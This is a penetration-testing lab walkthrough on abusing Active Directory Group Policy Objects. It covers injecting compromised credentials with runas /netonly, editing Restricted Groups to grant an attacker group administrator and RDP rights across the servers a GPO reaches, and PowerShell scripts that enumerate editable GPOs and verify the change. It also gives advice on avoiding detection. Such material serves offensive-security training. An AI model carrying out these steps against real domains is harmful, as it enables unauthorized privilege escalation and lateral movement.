Group Policy Objects
A Group Policy Object (GPO) is a virtual collection of policy settings. Each GPO is identified by a unique GUID (its display name can be changed, the GUID cannot). The file-system part of an AD GPO, the Group Policy Template, is stored in the SYSVOL share of every domain controller under \\<domain>\SYSVOL\<domain>\Policies\{GUID}; the matching container object, which carries the ACL that decides who may edit the GPO, lives in AD under CN=Policies,CN=System.
Each Windows computer has a local policy configuration, which any GPO applied to the computer can override. It contains several notable settings: application configuration, local group membership (for example the Administrators and Remote Desktop Users groups), startup configuration, security settings and so on.
Exploiting GPOs
Administrators
The simplest option is to add an AD account we control to both the local Administrators and Remote Desktop Users groups on the targets.
Administrators membership would also give us SSH access where the OpenSSH server is installed, but few organizations have deployed it on their Windows hosts, so RDP, and lateral movement with tools such as SMBExec, are the more reliable routes.
To modify the GPO we need to open Group Policy Management as an AD user that has the relevant permissions on that GPO.
We could RDP into a server with that user's credentials, but that may kick the user out of their active session and raise suspicion.
Suggested method: RDP into a machine we already have access to as a low-privileged user, inject the AD user's credentials into memory with the runas command, and open MMC from that shell to modify the GPO. With /netonly the new process keeps the low-privileged local token, but every network authentication it performs (SMB, LDAP and RPC to the domain controllers) uses the injected credentials, which is exactly what Group Policy Management needs.
:: Provide the password when prompted. /netonly does NOT validate the password up front,
:: so a typo only shows up when a network resource is touched
runas /netonly /user:za.adobe.loc\AD-Username cmd.exe
:: Verify the injected credentials by listing SYSVOL on the domain controller (where the GPO files live)
dir \\za.adobe.loc\sysvol
:: Start the Microsoft Management Console from the same prompt so it inherits the injected credentials
mmc
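Before clicking through MMC it is worth knowing exactly which GPOs the injected account can edit and where they are linked. The script below is an added example, not code from the original page or the lab; it is meant to be run from a PowerShell started inside the runas /netonly shell, so its LDAP and SMB traffic carries the injected credentials. It assumes the RSAT GroupPolicy module is installed on the host and uses the domain and account name from the walkthrough as placeholders. Because edit rights are usually granted to groups rather than users, it resolves the account's nested group membership over LDAP first and matches those names against every GPO's ACL.

```powershell
# Added example, not code from the original page or lab. Run it inside the shell started
# with "runas /netonly" (or a PowerShell launched from it): the process keeps the local
# low-privileged token, but LDAP and SMB traffic to the domain controllers carries the
# injected AD credentials. Needs the RSAT GroupPolicy module on this host.
# The domain and account names are assumptions for this walkthrough.
Import-Module GroupPolicy

$Domain  = 'za.adobe.loc'
$Account = 'AD-Username'    # sAMAccountName of the account injected with runas /netonly

# /netonly does not validate the password up front, so touch SYSVOL first.
if (-not (Test-Path "\\$Domain\SYSVOL")) {
    throw "Cannot reach \\$Domain\SYSVOL - the injected credentials are probably wrong"
}

# Escape the characters that have meaning inside an LDAP filter (RFC 4515).
function ConvertTo-LdapFilterValue([string]$Value) {
    $Value -replace '\\', '\5c' -replace '\(', '\28' -replace '\)', '\29' -replace '\*', '\2a'
}

# Resolve the account's DN, then every group it belongs to (nested included) with the
# LDAP_MATCHING_RULE_IN_CHAIN rule, so rights granted through groups are not missed.
$user = ([adsisearcher]"(&(objectClass=user)(sAMAccountName=$(ConvertTo-LdapFilterValue $Account)))").FindOne()
if (-not $user) { throw "Account $Account not found in $Domain" }
$userDN = [string]$user.Properties['distinguishedname'][0]
$groups = ([adsisearcher]"(member:1.2.840.113556.1.4.1941:=$(ConvertTo-LdapFilterValue $userDN))").FindAll() |
    ForEach-Object { [string]$_.Properties['samaccountname'][0] }

# Primary group (Domain Users) and the well-known identities are not in "member", add them by hand.
$trustees = @($Account) + @($groups) + @('Domain Users', 'Authenticated Users', 'Everyone')

$editRights = 'GpoEdit', 'GpoEditDeleteModifySecurity'

$results = foreach ($gpo in Get-GPO -All -Domain $Domain) {
    $matching = Get-GPPermission -Guid $gpo.Id -Domain $Domain -All |
        Where-Object { $_.Permission -in $editRights -and $_.Trustee.Name -in $trustees }
    if (-not $matching) { continue }

    # Where the GPO is linked tells us which computers the change will land on.
    [xml]$report = Get-GPOReport -Guid $gpo.Id -Domain $Domain -ReportType Xml
    $links = @($report.GPO.LinksTo | ForEach-Object { $_.SOMPath })

    [pscustomobject]@{
        GPO        = $gpo.DisplayName
        Id         = $gpo.Id
        ViaTrustee = ($matching.Trustee.Name | Select-Object -Unique) -join ', '
        Permission = ($matching.Permission | Select-Object -Unique) -join ', '
        LinkedTo   = if ($links) { $links -join '; ' } else { '<not linked>' }
    }
}

$results | Format-Table -AutoSize
```

A GPO that is editable but linked nowhere is useless for this technique; the LinkedTo column is what tells you which OU, and therefore which computers, the Restricted Groups change will reach.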
Microsoft Management Console
- The next step is to add the Group Policy Management snap-in:
  - Click File ➜ Add/Remove Snap-In
  - Select the Group Policy Management snap-in and click Add
  - Click OK
We can now navigate to the GPO that our user has permission to modify (Servers > Management Servers > Management Server Pushes).
Right-click the GPO and select Edit. This opens the Group Policy Management Editor window.
- To add our account to the local groups, we perform these steps:
  - Expand Computer Configuration
  - Expand Policies
  - Expand Windows Settings
  - Expand Security Settings
  - Right-click Restricted Groups and select Add Group
  - Click Browse, enter [The Group Name you want to Compromise], click Check Names, then click OK twice
The properties dialog for the restricted group has two lists. The first, "Members of this group", is left empty: it defines an enforced, exact member list for the group and is not what we want. The second, "This group is a member of", is the one we use: add both the Administrators and Remote Desktop Users groups there. This form is additive, so on every affected computer our group is appended to those local groups without removing their existing members. Do not take the shortcut of adding Administrators itself as the restricted group with our account under "Members of this group": that replaces the whole local Administrators membership, which is destructive and far more likely to be noticed.
Once the configuration has been made, click Apply and OK. Group Policy Management writes the change into the GPO's GptTmpl.inf in SYSVOL and bumps the GPO version number, which is what makes clients pick it up on their next refresh.
Now we need to wait at most 15 minutes for the GPO to be applied in this environment. (The Windows defaults are a background refresh every 90 minutes plus a random offset of up to 30 minutes for domain members, and every 5 minutes for domain controllers; the interval is set by the system administrators and differs between environments.)
After this, every account in the compromised group will have administrative and RDP permissions on every computer the GPO is linked to (here, the management servers), not just one server.
:: Verify the new membership from a fresh logon (for example a new RDP session) on an affected
:: server; an existing session keeps its old access token and will not show the added groups
whoami /groups
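Rather than waiting out the refresh interval to learn whether the edit landed as intended, the Restricted Groups entry can be read back from SYSVOL immediately. The script below is an added example, not code from the original page or the lab; it runs from the same runas /netonly shell, assumes the RSAT GroupPolicy module and uses the domain and GPO display name from the walkthrough as placeholders. It parses the [Group Membership] section of the GPO's GptTmpl.inf, distinguishes the additive "This group is a member of" entries from the enforced "Members of this group" entries, and compares the AD and SYSVOL version numbers that clients use to decide whether the GPO must be re-applied.

```powershell
# Added example, not code from the original page or lab. Run from the same runas /netonly
# shell after saving the edit: it reads the GPO's Restricted Groups template from SYSVOL so
# the change can be checked before the refresh timer expires. Requires the RSAT GroupPolicy
# module; the domain and GPO display name are assumptions for this walkthrough.
Import-Module GroupPolicy

$Domain  = 'za.adobe.loc'
$GpoName = 'Management Server Pushes'

$gpo     = Get-GPO -Name $GpoName -Domain $Domain
$policy  = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}"
$infPath = Join-Path $policy 'Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf'

# Tokens in GptTmpl.inf are either "*<SID>" or a plain name; turn SIDs into names where possible.
function Resolve-Principal([string]$Token) {
    $value = $Token.Trim().TrimStart('*')
    if ($value -notmatch '^S-1-') { return $value }
    try {
        (New-Object System.Security.Principal.SecurityIdentifier $value).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { $value }
}

# Parse just the [Group Membership] section. Each restricted group produces two keys:
#   <group>__Memberof = local groups the group is ADDED to ("This group is a member of")
#   <group>__Members  = the group's enforced member list ("Members of this group")
$section = $null
$entries = foreach ($line in Get-Content -Path $infPath) {
    if ($line -match '^\[(?<name>[^\]]+)\]') { $section = $Matches.name; continue }
    if ($section -ne 'Group Membership') { continue }
    if ($line -match '^(?<grp>.+?)__(?<kind>Memberof|Members)\s*=\s*(?<val>.*)$') {
        $grp = $Matches.grp; $kind = $Matches.kind; $val = $Matches.val
        [pscustomobject]@{
            Group   = Resolve-Principal $grp
            Kind    = $kind
            Targets = @($val -split ',' | Where-Object { $_.Trim() } | ForEach-Object { Resolve-Principal $_ })
        }
    }
}

if (-not $entries) { throw "No [Group Membership] entries in $infPath - was the edit saved?" }

foreach ($e in $entries) {
    if ($e.Kind -eq 'Memberof' -and $e.Targets.Count -gt 0) {
        # Additive: existing members of the target local groups are left alone.
        '{0} will be ADDED to: {1}' -f $e.Group, ($e.Targets -join ', ')
    } elseif ($e.Kind -eq 'Members' -and $e.Targets.Count -gt 0) {
        # Enforced: on a local group such as Administrators this evicts every current
        # member, which is destructive and far more likely to be noticed.
        'WARNING: membership of {0} will be REPLACED with: {1}' -f $e.Group, ($e.Targets -join ', ')
    }
}

# Clients only re-apply a GPO whose version number changed. Get-GPO exposes both the AD
# (gPCVersionNumber) and SYSVOL (GPT.ini) computer-side versions; a mismatch means the
# edit has not finished replicating between domain controllers yet.
'Computer policy version: AD={0} SYSVOL={1}' -f $gpo.Computer.DSVersion, $gpo.Computer.SysvolVersion
if ($gpo.Computer.DSVersion -ne $gpo.Computer.SysvolVersion) {
    'Versions differ: wait for AD/SYSVOL replication before expecting clients to pick it up.'
}
```

For the edit described above the expected output is a single ADDED line naming the compromised group and the BUILTIN\Administrators and BUILTIN\Remote Desktop Users groups, and no WARNING lines. Once the refresh has run on a target, net localgroup administrators on that machine lists the group regardless of session, whereas whoami /groups only reflects it in a logon that started after the change.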